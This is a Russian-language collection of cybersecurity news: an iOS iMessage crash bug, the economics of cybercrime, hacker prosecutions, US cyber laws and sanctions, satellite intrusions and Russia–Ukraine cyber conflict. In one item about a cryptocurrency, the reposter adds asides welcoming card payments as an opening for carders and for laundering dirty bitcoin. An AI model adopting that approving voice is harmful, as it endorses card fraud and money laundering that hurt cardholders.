Пользователи Reddit обнаружили неисправность в операционной системе iOS, которая позволяет вызвать перезагрузку смартфона человека, отправив ему определённый набор символов через iMessage или SMS. Об этом сообщает Mac Rumors. Айфон пользователя, получившего специальную комбинацию из символов, включающую в себя текст на арабском, тут же уходит в респринг — перезагрузку системного приложения, отвечающего за отображение рабочего стола и запуск других программ в iOS. На этом проблемы не заканчиваются: если у владельца айфона не была открыта беседа, в которой ему прислали вредоносное сообщение, то приложение iMessage начнёт вылетать при каждом запуске. Если она была открыта, то приложение «упадёт», если попытаться перейти в список бесед. Как отмечает Mac Rumors, баг работает в iOS 8.3, однако остаётся неизвестным, подвержены ли ему другие версии системы. Избавиться от проблемы можно несколькими способами. Если у пользователя была открыта беседа, в которой ему прислали подобное сообщение, то достаточно написать отправителю любой ответ. В случае, если беседа не была открыта, а iMessage вылетает при каждом запуске, необходимо попросить другого пользователя прислать себе одно новое сообщение или сделать это самостоятельно, используя Siri или функцию «Поделиться» в любой программе. Как сообщает пользователь Твиттера, пообщавшийся с техподдержкой Apple, компания осведомлена о наличии неисправности.

Международная система расчетов WebMoney Transfer открывает возможность пополнения Z-кошельков через сеть платежных киосков NT.Payments в Объединенных Арабских Эмиратах. В рамках сотрудничества с компанией NT.Payments, специализирующейся на установке и обслуживании платежных терминалов, во всех семи эмиратах появилось порядка полутора тысяч новых точек пополнения WebMoney-кошельков. Для мгновенного зачисление средств участники системы теперь могут воспользоваться ближайшими киосками самообслуживания. Такие киоски располагаются, как правило, в людных местах и доступны круглосуточно. Помимо платежных терминалов, пополнить WebMoney-кошелек в зависимости от страны можно с помощью интернет-банкинга, банковских отделений, предоплаченных карт и ваучеров, а также платежным, банковским переводом и другими способами.

Доходы киберпреступников могут более чем в 20 раз превышать их затраты на организацию атак. Это следует из анализа, выполненного экспертами «Лаборатории Касперского». По их данным, создание в популярной социальной сети фишинговой страницы для заманивания доверчивых пользователей на мошеннический сайт и организация спам-рассылки с упоминанием этого сайта-подделки обходятся мошенникам сегодня в среднем в 150 долларов. Если же на их удочку «клюнут» хотя бы 100 человек, то злоумышленники смогут заработать до 10 тысяч долларов, продав похищенные таким образом конфиденциальные данные пользователей. Мобильный троянец, блокирующий экраны гаджетов, обойдется преступникам уже заметно дороже — в среднем в тысячу долларов. Однако и выручка от его использования получается больше. Цены, которые злоумышленники запрашивают со своих жертв за разблокирование экрана смартфона, варьируют от 10 до 200 долларов. Значит, со ста пострадавших можно получить до 20 тысяч долларов. Немало можно заработать и с помощью программ, зашифровывающих файлы с данными на атакованном компьютере. Однако расходы хакера будут в два раза выше — около двух тысяч долларов. Наибольшую же доходность мошенникам обеспечивает применение банковских троянцев, которые «охотятся» напрямую за деньгами пользователей. Потратив около трех тысяч долларов на приобретение подобного зловреда в комплекте с эксплойтом (исполняемой программой для его внедрения) и специально организованной для этого спам-рассылкой, киберпреступники имеют шанс получить до 72 тысяч долларов от ста успешных атак. В этом случае средняя потеря одного пострадавшего пользователя составит 722 доллара. При этом, по оценке аналитиков, купить вредоносное программное обеспечение сегодня не составляет больших проблем: зловреды легко можно найти на различных хакерских форумах, а довольно низкая стоимость делает их широко доступными. «Более того, киберпреступникам даже не требуется быть профессионалами в своем незаконном бизнесе — за фиксированную цену они получат уже готовый пакет программ для совершения атак. В такой ситуации пользователям, безусловно, стоит всегда быть начеку, чтобы не потерять деньги и свои ценные данные», — говорит главный антивирусный эксперт «Лаборатории Касперского» Александр Гостев.

Новой жертвой Кардинга становится,криптовалюта Nofiatcoin (XNF). Свежий игрок на рынке криптовалют Nofiatcoin (XNF) поделился очередными нововведениями в своей деятельности. Прежде всего, платформа криптовалюты XNFTrading.com, которая начала работу в апреле 2014 года, запускает обновленную версию еще в этом месяце. Кроме того, важным новшеством стала доступность оплаты Nofiatcoin с помощью банковских карт Visa и MasterCard.А это и есть разгул для наших кардеров.Минимальная сумма транзакции также была снижена с 300 USD to 25 USD (или эквивалентная сумма в другой валюте). Новая версия платформы представит также новую возможность, ранее недоступную для других криптовалют — на XNFTrading.com купить валюту Nofiatcoin можно за Bitcoin. Глэдис Энрикес, директор по маркетингу, прокомментировал: “Мы получаем сотни запросов в месяц от держателей биткоин, которые интересуются, когда же мы начнем работать с BTC. Мы пошли на встречу своим клиентам и добавили опцию обмена Bitcoin (BTC) на Nofiatcoin (XNF) на платформе XNF Trading 2.0.”Эти действия привлекут большие отмывы грязных BTC. Поскольку XNFTrading.com — это платежный шлюз сети Ripple, в новой платформе будет также доступна возможность находить счета с XRP, валютой Ripple. В настоящее время Nofiatcoin проводит маркетинговые кампании в Южной Корее, на Филиппинах, в Индонезии и России.

После очередного DDosa какими то не приятелями,мы ровно месяц восстанавливали базу данных. Удачи всем в работе!

17 летнего хакера из Новосибирска, атаковавшего с помощью компьютерной программы сайт Кремля, амнистировали. Такое решение вынес Кировский районный суд. Как сообщили в прокуратуре региона, уголовное дело в отношении молодого человека прекращено в связи с амнистией, объявленной в России по случаю 70-летия победы в Великой Отечественной войне. По данным следствия, летом 2014 года подросток пытался активировать вирусную программу и направить ее на сайт www.kremlin.ru. Попытка не увенчалась успехом, однако действия юного хакера были отслежены сотрудниками ФСБ. Добавим, что подсудимый полностью признал свою вину. По статье о распространении вредоносной программы парню грозило до 4-х лет лишения свободы, пишет «Эхо Москвы».

Министр обороны США Эштон Картер в калифорнийском Стэнфордском университете рассказал о новой «атаке» российских хакеров на серверы Пентагона. По его словам, компьютерные взломщики из РФ в 2015 году проникли в несекретные оборонные сети США, обнаружив уязвимость в одной из сетей Пентагона. Как заверил Картер, специалисты службы компьютерной безопасности «быстро пресекли данную хакерскую деятельность в этой сети», пишет Вести.Ru. «Мы изучили их тактику, интернет-активности и выяснили, что они (хакеры) действуют с территории России, затем убрали их из сети, минимизировав их шансы на повторную атаку», — сказал глава Пентагона. Отметим, что никаких весомых доказательств своих слов Картер предоставить не смог. Добавим, что США часто подвергаются масштабным хакерским атакам, среди подозреваемых, как правило, выступают РФ и Китай.

Несостоявшаяся жертва хакеров из Naikon контратаковала их с помощью специально созданного бэкдора. Эксперты «Лаборатории Касперского» сообщили о весьма редкой и необычной вредоносной кампании, которую они назвали «Империя наносит ответный удар». Кампания выглядит как война между двумя различными хакерскими группировками, в ходе которой одни злоумышленники атакуют других. По словам экспертов, «Империя наносит ответный удар» может символизировать начало новой тенденции в киберпреступной деятельности – войны в сфере расширенных постоянных угроз или APT-войны. Анализируя активность известной группировки Naikon, занимающейся кибершпионажем в Азиатско-Тихоокеанском регионе, исследователи обнаружили, что хакеры стали жертвами атаки другой, совсем непримечательной группы Hellsing. Эксперты зафиксировали, что одна из предполагаемых жертв Naikon попыталась контратаковать противника с помощью фишинговых писем с вредоносным вложением. Получив подозрительное фишинговое письмо от Naikon, потенциальная жертва из госучреждения одной из стран Азиатско-Тихоокеанского региона вступила в переписку с атакующим. Пользователь ответил на письмо с просьбой подтвердить личность его автора. Будучи хорошо знакомым с внутренней структурой атакуемого учреждения, злоумышленник назвался сотрудником секретариата. Не открывая вредоносное вложение, пользователь отправил атакующему еще одно письмо с RAR-архивом, содержащим два PDF- и один SCR-файл. Эксперты обнаружили, что последний представлял собой бэкдор, специально предназначенный для Naikon. Подобная контратака свидетельствует о том, что Hellsing пыталась идентифицировать Naikon и собирала информацию об этой группировке. Более подробный анализ активности Hellsing показал, что ее участники рассылали большое количество вредоносных писем с целью распространения шпионского ПО в государственных организациях Малайзии, Филиппин, Индонезии, Индии и даже США (дипломатических органах).

Нижняя палата парламента США приняла два новых закона, которые относятся к информационной безопасности: это Закон о защите компьютерных сетей (Protecting Cyber Networks Act) и Закон о продвижении национальной кибербезопасности (National Cybersecurity Protection Advancement Act). Одновременно министерство обороны опубликовало официальную стратегию кибербезопасности. Первый закон описывает правила по обмену информацией между коммерческими компаниями и государственными организациями. Компаниям гарантируется юридическая защита в том случае, если они сообщают властям информацию о взломе. Сообщать о взломах компании должны через специальный «киберпортал», который будет создан на сайте министерства внутренней безопасности. Закон вызвал неоднозначную реакцию среди экспертов. Сторонники говорят, что он поможет предотвратить и бороться с последствиями крупных корпоративных взломов, часто сопровождающихся массовой утечкой конфиденциальных данных о пользователях. Критики считают, что он только увеличивает риски утечки данных. Хотя нормативный акт устанавливает процедуру, чтобы личные данные удалялись перед загрузкой на «киберпортал», но риск утечки всё равно существует. Получается, что закон только увеличивает возможности государства для слежки за гражданами. С призывом голосовать против закона выступала коалиция из 36 правозащитных организаций и 19 специалистов по безопасности. Перед голосованием они опубликовали открытое письмо к парламентариям. Эти действия остались без результата. Результат голосования 307-116 за принятие закона. Закон о продвижении национальной кибербезопасности не вызвал таких споров. Он был принят с большим преимуществом голосов (355-63). Хотя эксперты не высказываются против этого закона, но существуют опасения, что его будут применять не совсем корректным образом, в сочетании с вышеупомянутым Законом о защите компьютерных сетей. В официальной стратегии кибербезопасности говорится, что для защиты национальной инфраструктуры создаётся новое подразделение Cyber Mission Force. Представители минобороны сказали, что сейчас его штат укомплектован примерно на половину, а в полном составе оно будет включать в себя 133 группы с более чем 6000 «бойцов».

Компьютерные хакеры, вероятно из среды китайских военных, смогли четырежды в 2007 и 2008 годах инфицировать два американских правительственных спутника через наземные станции в Норвегии. Об этом на деле было сообщено на закрытых слушаниях в Конгрессе США. В отчете, черновик которого был представлен американским политикам на неделе, говорится, что хотя зараженные спутники и применялись для исследования климата и топографической несекретной съемки, вторжение в программное обеспечение спутников представляет собой совершенно новый уровень опасности и атак. "Такие вмешательства представляют собой целый ряд угроз, особенно если рассматривать их применительно к спутникам с более стратегическими задачами… Доступ хакеров к системе контроля спутников позволит атакующему сделать со спутников все, что угодно, вплоть до уничтожения. Кроме того, атакующий может незаметно манипулировать спутниковыми данными, чтобы законный владелец аппарата получал искаженные данные", - говорится в черновике документа, окончательная версия которого должна быть представлена в ноябре. Согласно данным отчета, спутник дистанционного зондирования Земли Landsat-7 стал жертвой хакеров в 2007 и 2008 годах, когда злоумышленники фактически захватили контроль над аппаратом "более чем на 12 минут". Аппарат Terra AM-1 также был дважды захвачен хакерами - в июне 2008 и октябре 2009 годов. В первом случае хакеры получили контроль над спутником всего на 2 минуты, а во втором - "более чем на 9 минут". В черновике отчета ничего не говорится о том, что именно делали хакеры со спутниками, когда те находились под их фактическим контролем. В США разведывательные ведомства очень активно используют спутники для связи, сбора разведывательной информации и иных операций. Отметим, что в отчете напрямую не обвиняется официальный Пекин и не указывается, что власти КНР спонсируют подобные мероприятия. Однако в отчете говорится, что подобные действия полностью согласуются с нынешней китайской военной доктриной, которая в случае ведения боевых действий в качестве одного из первоочередных шагов предусматривает захват контроля над спутниками и спутниковой наземной инфраструктурой противника. Власти США уже в течение последних 5-6 лет обвиняют китайское правительство в организации кибератак и взлом западных компьютерных сетей с целью получения государственных и коммерческих тайн. Впрочем, виновные в реальном проведении подобных атак так и не были задержаны, а сам официальный Пекин отрицает участие страны в таких операциях. В последнем похожем американском военном отчете сказано, что "лица, участвующие во вторжениях в сети США, хорошо говорят на китайском языке, работают через серверы расположенные в Китае и имеют государственную финансовую поддержку". В то же время, Пентагон признает, что это лишь косвенные доказательства, прямых фактов пока нет. Американские военные эксперты говорят, что в Китае военизированные хакерские подразделения возникли примерно десять лет назад, однако тогда в их задачи входило подавление интернет-присутствия запрещенной в КНР религиозной группировки Фалуньгун. Официальный Пекин на протяжении всех этих лет постоянно отрицал факт своего участия в подобных атаках, хотя как в США, так и в Европе указывали на причастность этой азиатской страны. Официальный МИД КНР заявляет, что знаком с западными документами, расследованиями и заявлениями, однако считает их голословными и не признает за собой никакой вины. "Мы считаем, что целью подобных кампаний является очернение имиджа Китая на международной арене", - заявили в МИДе страны. "Китайское правительство активно сотрудничает с другими странами в борьбе против киберпреступников". По данным Минобороны США, количество атак на государственные сети стабильно растет с 2001 года, причем основным генератором не являются китайские государственные хакеры. Основной поток атак приходится на разрозненные хакерские группы, пытающиеся похитить данные, которые потом можно будет продать. Согласно официальной информации Пентагона, в 2001 году на его сети было совершено 3 651 атака, тогда как в 2009 году - уже 71 661 атака. В прошлом году этот показатель составил 55 812, в 2011 году он, как ожидают эксперты, составит примерно 55 100 атак. В США говорят, что атакованные спутники управлялись совместными усилиями НАСА и Геологической службы США через наземные станции на Шпицбергене (Норвегия). В НАСА говорят, что часто для передачи данных со спутников применяют наземные станции других стран, в частности Норвегии или Австралии. В черновике говорится, что хакерам удалось захватить системы промышленного контроля в Норвегии, а далее передать нужные данные на спутники уже не составило проблем. Официально, Китай ни разу так и не подтвердил факт своего причастия к компьютерным атакам. Исключение было лишь в 2001 году, когда китайский телеканал CCTV7 сообщил, что Народно-освободительная армия Китая написала специальное программное обеспечение для атаки на ресурсы Фалуньгун, которое считается запрещенным движением сектантов.

Украинские активисты собирают виртуальное ополчение для защиты в информационной войне В воскресенье 2 марта на сайте российского госканала Russia Today творились странные вещи. В заголовках новостей, связанных с Россией, появилось слово Nazi («нацизм»). Выглядело дико: «Российские сенаторы одобрили использование нацистских войск на территории Украины». Администрация сайта заявила о хакерской атаке: «Взломали доступ админа. Сейчас контроль над сайтом восстановлен». Несколько часов спустя кибератаки отбивали уже на Украине — информагентство УНИАН чуть было не «легло» под DDoS-атакой. «Мощнейшая, непрерывная, продолжается до сих пор», — в понедельник предупреждала посетителей администрация сайта. Медийные противники — Russia Today и УНИАН — оказались на передовой современной войны, в которой артиллерийскую подготовку, прорывы «танковых клиньев» и высадку морской пехоты предваряют DDoS-атаки, «боевые вирусы», дезинформация и дискредитация противника в соцсетях и форумах. «Война уже идет, и главная цель в ней — это атака на общественное мнение, — замечает Илья Сачков, руководитель компании Group-IB, специализирующейся на раскрытии киберпреступлений. — Для создания суматохи, неразберихи используются информационные ресурсы — соцсети, блоги и микроблоги». По мнению эксперта, вывод какого-то ресурса из строя, DDoS-атака — это открытый факт агрессии, а манипулирование СМИ и соцсетями — вещь законодательно нерегулируемая и сложно доказуемая. Похоже, Сачков прав. Атаки на RT и УНИАН остаются пока единственными крупными примерами кибепротивоборства России и Украины. Фиксируемые специалистами взломы и DDoS-атаки сайтов — legalru.ru, crownservice.ru (Россия) и una-unco.in.ua, pogromukieva.net (Украина) больше походят на разминку, чем на реальные удары по инфраструктуре. Куда чаще противники, как ударами, обмениваются в соцсетях фэйковыми новостями, компроматом и «вирусными роликами». То появляется переписка, раскрывающая факты финансирования лидера «УДАРа» Виталия Кличко западными странами, то активист Евромайдана сообщает в Facebook о смерти Виктора Януковича, то украинские националисты объявляют, что готовы войти в Крым, если местные татары покажут им склады с оружием. Даже специалисты до конца не понимают, что это: утечка или искусно состряпанная деза. Все может измениться, если к кибервойне подключатся не хакеры-любители, а профессионалы, располагающие инструментами вроде боевого вируса Stuxnet, атаковавшего объекты ядерной инфраструктуры Ирана. На Украине к этому уже начали готовиться: параллельно со всеобщей мобилизацией населения там формируется еще один фронт — виртуальный. «Связаться в личке и быть готовым к бою» «В связи с военной интервенцией РФ против Украины прошу всех, кто имеет технические возможности противостоять врагу в информационной войне, связаться со мной в личке и быть готовым к бою. Будем связываться с силовиками и объединять усилия против внешнего врага», — такое сообщение разместил в LinkedIn Константин Корсун, руководитель «Украинской группы информационной безопасности» (UISG). «Мое сообщение подлинное, — подтвердил Корсун Forbes. — Хочу обратить внимание: мы защищаемся, ни о каких видах нападения или контрнападения речь не идет». Корсун мало похож на заигравшегося в Counter-Strike сисадмина. У 43-летнего полковника в отставке за спиной серьезный послужной список: 10 лет в подразделении по борьбе с киберпреступностью Службы безопасности Украины (СБУ), четыре года в Государственной службе специальной связи и защиты информации Украины, где до ухода на пенсию возглавлял подразделение CERT-UA (компьютерная группа реагирования на чрезвычайные ситуации). В 2009 году Корсун ушел в бизнес, связанный с информационной безопасностью — он возглавляет украинское представительство американской iSight Partners, сотрудничающей с Секретной Службой США и Пентагоном. «Если вы ищете некую «американскую руку» в моей/нашей деятельности, то вы ее не найдете, о связях со спецслужбами США мне неизвестно», — уверяет Корсун, замечая, что многие его коллеги по информационной безопасности работают в украинских отделениях западных банков, ИТ-компаний, интеграторов и провайдеров. Объявленную мобилизацию IT-специалистов Корсун объясняет необходимостью защищать «свое киберпространство». Что именно он собирается делать? В случае массированных DDoS-атак и других видов атак, по словам Корсуна, UISG готово предоставлять онлайн-консультации по вопросам киберзащиты и построения систем безопасности, бесплатно отдавать в аренду программное обеспечение и предоставлять резервные площадки. «В случае атаки на сайт Нацбанка расследованием будут заниматься подразделения по противодействию киберпреступности при МВД Украины и СБУ, а нашу задачу мы видим в быстрейшей ликвидации как самой атаки, так и минимизации ее вредных последствий», — рассуждает Корсун. По его словам, серьезной системы киберзащиты на Украине практически нет. Более-менее грамотно защищаются лишь ресурсы президента Украины, Верховной Рады и еще нескольких органов исполнительной власти. «Даже те крохи, что выделялись на повышение уровня защищенности государственных информационных ресурсов, либо разворовывались, либо использовались не по назначению», — сетует Корсун, замечая при этом, что украинские силовики в общей своей массе деморализованы. Но, оказывается, не все. «На меня можно расчитывать, — отвечает на призыв Корсуна Максим Литвинов, начальник Управления борьбы с киберпреступностью в МВД Украины. — Есть аналитики, есть лаборатория, личный состав без дезертиров. Предлагаю не ждать взломов, а провести пен-тесты (тестирование на проникновение) критических объектов, данные готов обобщить и перезнакомить тестеров с админами потенциальных потерпевших». Сообщение об IT-мобилизации на Украине похоже на PR организации UISG, считает Илья Сачков из Group-IB: «Я знаю, что у американцев сверхмощная киберармия, в России, я думаю, она только зарождается, и уверен, что на Украине ее вообще нет. В условиях кибервойны Украина ничего не сможет сделать своими силами и с помощью ИТ-ополчения». Действительно, признается Корсун, массовых кибератак со стороны России пока не зафиксировано, но «мы не хотим быть застигнутыми врасплох, как это было во время информационной войны в Прибалтике и Грузии». Гонка кибервооружений Вечером 26 апреля 2007 года в Эстонии наступил хаос. Сайты правительственных учреждений, банков, СМИ обрушились под лавиной запросов, идущих от армии зараженных компьютеров со всего мира. Причина массированной DDoS-атаки угадывалась просто — это был ответ на решение таллинских властей перенести памятник советскому Бронзовому солдату. Год спустя, во время пятидневной войны в Южной Осетии, атаке подверглись уже грузинские сайты правительственных ресурсов, банков, медиахолдингов. На сайте МИДа хакеры повесили коллаж из фотографий, намекающих на сходство грузинского лидера с Адольфом Гитлером. «Это было что-то вроде патриотического собора, — вспоминает те события российский эксперт по кибербезопасности. — На русских хакерских форумах собирались добровольцы и ддосили сайты Эстонии, а в 2008 году — уже и Грузии. После тех событий в Талине открыли Центр киберзащиты НАТО». В России борьбой с киберугрозами исторически занимался Центр информационной безопасности (ЦИБ) ФСБ и Бюро специальных технических мероприятий (БСТМ) МВД. Если ЦИБ борется в виртуальном пространстве с иностранными спецслужбами, экстремистскими и преступными организациями, то БСТМ расследует в основном компьютерные преступления. До атаки одного из первых проявлений кибероружия — червя Stuxnet — в России мало кто задумывался о том, что будет происходить в случае перехода войны в виртуальное пространство, замечает эксперт по информационной безопасности Cisco Systems Алексей Лукацкий. По его словам, ситуация изменилась год-два назад, когда российские власти озаботились вопросом противодействия кибернападкам. Приняты нормативные акты, по большей части — секретные, определены стратегические задачи, начат набор людей и проведение различных научно-исследовательских разработок по «кибертематике». В прошлом году Минобороны заявило о готовности создать специальные кибервойска, которые будут отражать атаки со стороны других государств и контратаковать. «Но до структуры, аналогичной американскому киберкомандованию, нам еще далеко», — полагает Алексей Лукацкий. В США за кибервойны и защиту стратегически важных сетей с 2006 года отвечает специальное подразделение Минобороны — US Cyber Command. Здесь работает около 900 человек, но в течение нескольких лет его штат планируется расширить до 5000 человек. Руководителем US Cyber Command долгое время был Кит Александер, возглавлявший Агентство национальной безопасности (АНБ) — «империю зла», разоблаченную Эдвардом Сноуденом. С начала 2011 года Пентагон развивает систему SMISC (Social Media in Strategic Communication), которая отслеживает все политические дискуссии и устанавливает, являются ли они случайным продуктом коллективного разума или пропагандистской операцией со стороны противника. В 2012 году киберподразделение Пентагона — DARPA запустило программу под кодовым названием Plan X — ее целью является «создание революционных технологий, которые позволят понимать, планировать и управлять информвойной в режиме реального времени». Имеется в виду как нанесение ущерба компьютерными программам и технике, так и манипулирование людьми. В 2012 году на свет появилось так называемое «Таллиннское руководство», разработанное независимыми экспертами по заказу НАТО. В нем была сделана попытка применить нормы международного права к киберпространству и распространить уже привычные термины из военного дела на интернет и кибервооружения. «Выводы, сделанные в «Таллиннском руководстве», говорят о том (хотя с этим многие и не согласны), что на угрозу применения кибероружия можно и нужно отвечать реальными бомбежками и авиаударами, — напоминает Лукацкий. — В США такую норму даже зафиксировали в своих доктринах ведения кибервойн и защиты своего виртуального пространства». Эксперты не исключают, что в случае полномасштабного виртуального конфликта России придется иметь дело уже не с Украиной, а с США. «Им было бы глупо не попробовать [разработки] на практике сейчас. А России было бы так же глупо не защищать свое информационное пространство и не пытаться применять такие же методы», — считает Сачков. Пробка от хакеров-активистов Собственные кибероружие и киберподразделения создают многие государства: США, Китай, Россия, Франция и Великобритания. К ним пытаются присоединиться Северная Корея, Иран, Вьетнам, рассказывает Александр Гостев, главный антивирусный эксперт «Лаборатории Касперского». Норвежская антивирусная компания Norman, расследовавшая атаки на нефтяные компании и на правительство страны, обнаружила вирус, который, по их мнению, был создан индийской компанией. Индийцы подали на Norman в суд. В отличие от реальных боевых действий установить заказчика компьютерной атаки сложно. «Выпущенная из шахты ракета однозначно говорит и о начале войны, и об ее инициаторе. В киберпространстве сложно не только определить причины (если она явно не заявлена предварительно), но и идентифицировать лицо, стоящее за кибератакой», — объясняет Лукацкий из Cisco. Например, три крупнейших банка и три медиакомпании Южной Кореи год назад подверглись атаке, в ходе которой были одновременно стерты данные на почти 50 000 компьютеров. В итоге банкоматы перестали принимать деньги, интернет-банкинг приостановил работу, частично было прекращено телевизионное вещание. Южная Корея обвинила в атаке Северную Корею. Но, кто знает, может, это хакеры из другой страны решили проверить созданный ими вирус? Или вирус Stuxnet, который атаковал центрифуги иранских заводов по обогащению урана. Ответственность за этот вирус не взяла на себя ни одна страна. Некоторые эксперты полагали, что за вирусом стояли США, но для полноценного обвинения собранных доказательств не хватило. «Преступники, которые занимаются таргетированными (целенаправленными) атаками, используют не один и не два сервера: зачастую это цепочка серверов, часть которых может находиться в США и Голландии, в то время как другая часть — в Азии, а из Азии направиться куда-нибудь еще, например в Австралию. Пройти по всей цепочке серверов до конца — это одна из серьезнейших проблем для исследователей и полиции, расследующей инциденты», — говорит Гостев из «Лаборатории Касперского». В октябре 2013 года в туннеле израильского города Хайфа образовалась огромная пробка. И все из-за кибератаки на автоматическую систему управления городским движением. Проникновение в систему не было достаточно профессиональным, и эксперты пришли к выводу, что это была проделка хакеров-активистов. Вроде тех, кто сейчас «кладет» сайты СМИ России и Украины.

Москва. 21 апреля. INTERFAX.RU - Находящийся в Таллине Центр кибер-сотрудничества НАТО проведете на этой неделе учения "Locked Shields 2015" с участием 400 представителей из 16 государств. "Это будут крупнейшие в мире учения подобного рода, в которых будут использованы реальные технологии, компьютерные сети и методы отражения кибер-нападений", - сообщили "Интерфаксу" во вторник в пресс-службе центра. Согласно сценарию учений, командам участников предстоит защищать компьютерные сети и информационные системы условного государства. Зарубежные атаки на него будут дополняться давлением со стороны СМИ и правовыми ограничениями. Цель - дать реалистичное представление о том, насколько большое воздействие могут оказать кибер-инциденты и насколько комплексными должны быть методы их решения. Центр кибер-сотрудничества НАТО проводит аналогичные учения с 2010 года. В этом году их поддерживает правительство Канады, которое финансирует пополнение используемых на них технических средств. Центр в Таллине является военной организацией, которая сосредоточена на исследовательских работах и подготовке кадров в области кибер-обороны. Целью Центра является улучшение деятельности, сотрудничества и обмена информацией НАТО, входящих в него государств и партнеров альянса.

Обама подписал указ о возможности введения санкций против киберпреступников. Президент США Барак Обама подписал в среду указ, который позволяет вводить санкции в отношении киберпреступников, угрожающих безопасности страны. Об этом, как передает ТАСС, говорится в заявлении распространенном пресс-службой Белого дома. "Сегодня я подписал распоряжение, которое предоставляет новые полномочия по реакции на угрозы со стороны киберпреступников. Указ позволяет министру финансов, по согласованию с генеральным прокурором и госсекретарем, накладывать санкции на физических или юридических лиц, которые участвуют во вредоносной кибердеятельности и создают серьезную угрозу для национальной безопасности, внешней политики, экономики и финансовой стабильности Соединенных Штатов", - говорится в комментарии президента США к постановлению. По словам президента Америки, под понятием вредоносная кибердеятельность понимается, в частности, "причинение вреда важнейшим объектам жизнеобеспечения населения, получение финансовой выгоды, путем присвоения материальных средств, кража коммерческой тайны, нарушение работоспособности компьютерных сетей". Согласно указу, идентификацией лиц, против которых будут применены санкции, занимаются министерство финансов, госдепартамент, а также генеральный прокурор, который возглавляет министерство юстиции. Указ позволяет вносить в санкционные списки США иностранных лиц, участвующих в кибератаках и кибершпионаже, либо оказывающих им ту или иную помощь. Санкции США предполагают замораживание активов человека, которые могут находиться в американской юрисдикции, а также введение запрета на деловые отношения с ними. Напомним, ранее Великобритания и США договорились о создании совместных подразделений экспертов по борьбе с киберпреступностью.